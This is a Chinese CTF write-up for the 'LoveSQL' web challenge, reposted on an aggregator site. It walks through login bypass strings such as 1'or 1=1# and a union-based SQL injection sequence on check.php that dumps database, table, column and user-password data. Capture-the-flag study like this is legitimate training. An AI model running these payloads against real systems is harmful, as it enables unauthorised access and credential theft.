码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • web:[极客大挑战 2019]LoveSQL


    题目

    打开页面显示如下

    查看源代码,查到一个check.php,还是get传参

    尝试账号密码输入

    题目名为sql,用万能密码

    1. 1'or 1=1#
    2. 或
    3. admin' or '1'='1'

    给了一段乱码,也不是flag

    查看字段数

    /check.php?username=admin' order by 3%23&password=1

    到4时报错,说明字段数为3

    用union来查询测试注入点,查看回显点

    构造payload

    /check.php?username=1' union select 1,2,3%23&password=1

    显示回显点为2和3

    查看数据库

    /check.php?username=1' union select 1,database(),version()%23&password=1

    可得到数据库名为geek 

    查看数据表

    /check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

    得到两个数据表

    查看表中字段

    1. /check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
    2. /check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

    字段都是一样的

    查看表中数据

    1. /check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
    2. /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

     geekuser表中数据为

    l0ve1ysq1表中数据为

    查看不全,看源代码

    总结

    用union来查询测试注入点,查看回显点

    参考文章链接:

    CTF-Web-[极客大挑战 2019]LoveSQL - 知乎

    LoveSQL-CSDN博客

  • 相关阅读:
    【Python入门五】第三方库(包)介绍
    笔记本电脑切换Fn功能键
    预处理器Less
    聊天室即时通讯系统源码 类似微信的H5聊天系统APP源码 ThinkPHP内核
    音乐推荐与管理系统Python+Django网页界面+协同过滤推荐算法
    Redis 缓存预热、预热数据选取策略、缓存保温、性能边界
    Python异步编程原理篇之协程的IO
    蓝桥杯算法竞赛系列第十章·nSum问题的代码框架
    java通过解密身份证计算年龄(精确到日)
    12个有效降低论文重复率的实用策略分享
  • 原文地址:https://blog.csdn.net/gsumall04/article/details/133418775
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号